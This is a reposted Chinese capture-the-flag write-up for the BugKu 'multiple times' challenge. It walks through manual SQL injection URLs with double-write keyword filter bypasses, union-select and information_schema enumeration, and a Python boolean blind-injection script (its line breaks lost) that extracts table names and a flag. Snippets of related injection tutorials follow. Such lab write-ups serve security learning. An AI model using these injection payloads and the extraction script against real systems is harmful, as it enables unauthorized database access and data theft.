BUGKU 多次 手动注入+脚本盲注
本文内容为SQL手动注入步骤+想法,以及盲注脚本。
http://123.206.87.240:9004/1ndex.php?id=1
http://123.206.87.240:9004/1ndex.php?id=1' 报错
http://123.206.87.240:9004/1ndex.php?id=1'--+ 正常 存在注入
http://123.206.87.240:9004/1ndex.php?id=1' and 1=1 --+ 报错 and被过滤,
http://123.206.87.240:9004/1ndex.php?id=1 ^(length(‘and’)!=0)^‘
使用length 判断过滤得出 or union select 被过滤
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+ 正常 双写绕过
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+ 报错 存在2个库
http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,2 --+ 正常 回显2号位
对二号位进行注入
http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,database()--+
数据库名 web1002-1
http://123.206.87.240:9004/1ndex.php?id=1‘ aandnd 1=2 uunionnion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema = database() --+
表名 flag1,hint
123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name = 'flag1' --+
字段 flag1,address
http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(flag1) from flag1 --+
flag1内容为:usOwycTju+FTUUzXosjr 填入发现不对,题目说有两个flag均为小写
http://123.206.87.240:9004/1ndex.php?id=1’ aandnd 1=2 uunionnion sselectelect 1,group_concat(address) from flag1 --+
address内容为下一关,点击进入下一关地址:http://123.206.87.240:9004/Once_More.php?id=1
http://123.206.87.240:9004/Once_More.php?id=1' 报错
http://123.206.87.240:9004/Once_More.php?id=1‘ --+ 正常 存在注入
http://123.206.87.240:9004/Once_More.php?id=1’ order by 2 --+ 正常
http://123.206.87.240:9004/Once_More.php?id=1’ order by 3 --+ 报错 存在两个库
http://123.206.87.240:9004/Once_More.php?id=1‘ ^(length(‘union’)!=0)^’ 正常 union被过滤
http://123.206.87.240:9004/Once_More.php?id=1‘ and 1=2 uunionnion select 1,2 --+ 双写无法绕过
http://123.206.87.240:9004/Once_More.php?id=1’ and 1=2 Union select 1,2 --+ 大小写无法绕过
http://123.206.87.240:9004/Once_More.php?id=1‘ ^(length(‘sleep’)!=0)^’ 正常 sleep被过滤 substr也被过滤
由于正确错误返回不同 尝试写脚本Bool盲注
import sys import requests from bs4 import BeautifulSoup import reurl_start = 'http://123.206.87.240:9004/Once_More.php?' sqldb ="id=1' and mid(database(),{0},1)='{1}'--+"sqltb ="id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema = database()),{0},1)='{1}'--+" sqltest ="id=1' and mid((select group_concat(column_name) from information_schema.columns where table_name ='flag2'),{0},1)='{1}'--+" sqlflag ="id=1' and mid((select flag2 from flag2),{0},1)='{1}'--+"def Brup(SQL):name=''for i in range(1,40):for ch in range(32,129):if ch == 128:sys.exit(0)payload = SQL.format(i,chr(ch))url_all = url_start+payload#print(url_all)html = requests.get(url_all)soup = BeautifulSoup(html.content, 'html.parser')result = soup.find_all(text = 'Hello,I Am Here!')#判断列表是否为空if len(result):name += chr(ch)print('name:'+name)breakif __name__ == '__main__':#Brup(sqldb)#Brup(sqltb)#Brup(sqltest) Brup(sqlflag)#tablename:class,flag2 #注:跑出来为大写,flag全为小写。
usOwycTju+FTUUzXosjr
web1002-1
转载于:https://www.cnblogs.com/Zhu013/p/11483305.html
BUGKU 多次 手动注入+脚本盲注相关推荐
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
- python实现sql宽字节注入+布尔盲注
目录 一.注意点 二.代码 三.使用 1.获取 (简单方法) (复杂方法) 2.使用 四.测试 一.注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基 ...
- sql注入_1-4_post盲注
sql注入_1-4_post盲注 一.post盲注概念 1.首先post盲注和get盲注一样,只是不会拼接到url中 2.post请求会向指定资源提交数据,请求服务器进行处理,如,表单提交,文件上传等 ...
- mysql注入之盲注语句汇总
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲 ...
- SQL注入2——盲注(重学)
SQL注入--盲注 SQL注入--盲注 SQL注入--盲注 一.布尔型盲注 1.判断 2.盲注库名 3.盲注表名 4.盲注列名 5.盲注数据 时间型盲注 总结 一.布尔型盲注 假如网站一定存在SQL注 ...
- sql注入--布尔盲注
sql注入–布尔盲注 靶场:sqli-labs-master 下载链接:靶场下载链接 第8关 盲注 php源码 <?php //including the Mysql connect param ...
- 【小迪安全】Day16web漏洞-SQL注入之盲注
web漏洞-SQL注入之盲注 文章目录 web漏洞-SQL注入之盲注 前言 盲注类型 报错盲注 猜解数据库 猜解表 猜解字段 猜解内容 布尔盲注 猜解数据库 猜解表 猜解字段 猜解内容 延迟注入 前言 ...
- 手动SQL注入(盲注)讲解
由于很多人(特别是针对初学者)在百度查找相关的SQL盲注的文章时总感觉无法得到一篇很基础,很完整的文章,所以在这里讲解一篇完整的SQL注入文章 1 查找源码之家等网站进行下载一个网站, 在这里我下载的 ...
- SQLi LABS Less 23 联合注入+报错注入+布尔盲注
第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
最新文章
- 织梦内容管理系统修改
- Python奇遇记:数据结构窥探2
- 数据产品设计专题(5)- 分布式数据仓库技术架构
- Java 内存模型 与 高效并发
- xml 需要转义
- 字符串匹配算法(三):KMP(KnuthMorrisPratt)算法
- 全球大学文凭“含金量”排名出炉:“北清复”名列30强
- 计算机故障按照产生机理来分可分为,维修自测题
- 2d Laser 和 camera 标定工具原理及使用方法
- 测试用例集-11.QQ表情收藏功能测试用例
- Excel的一些工作中不算是常见,但是遇到时常常不知所错的,问题,与解决方案。
- Vue自定义插件方法大全
- 6. laravel 控制器
- 40岁才博士毕业,新任安徽省长的他写了篇句句戳心的博士论文后记
- python自动答题助手_GitHub - SmileSmith/autoAnswer: 客户端答题工具,集成3个答题助手,包含AI自动答题,手动答题,adb控制多台手机等...
- 计算机一级怎么发送邮件到别人邮箱,电脑怎样发邮件到指定的邮箱地址(小白必须电脑操作邮件收发)...
- 又见猛犸象:基因剪刀重新定制生命
- 博弈论——4.1三人博弈的纳什均衡练习题
- 十大超级老牌黑客逐个曝光
- 怎么删除日历每日重复提醒事项
热门文章
- nvm nodejs npm快速安装
- python函数返回数组_从Cdef函数返回数组
- Mysql之查询基础select
- 确定进制(经典水题)
- activity android:launchmode,谨慎设置启动Activity的launchMode
- pytorch bert文本分类_一起读Bert文本分类代码 (pytorch篇 三)
- 【UVA10652】Board Wrapping(凸包+坐标旋转+多边形面积)
- html php连接mysql数据库连接,PHP如何连接MySQL数据库?附两种方法!
- java符号用语_java常用语
- 【optimization、pypi-packages、Github、GitCode、pip】optimtool介绍文档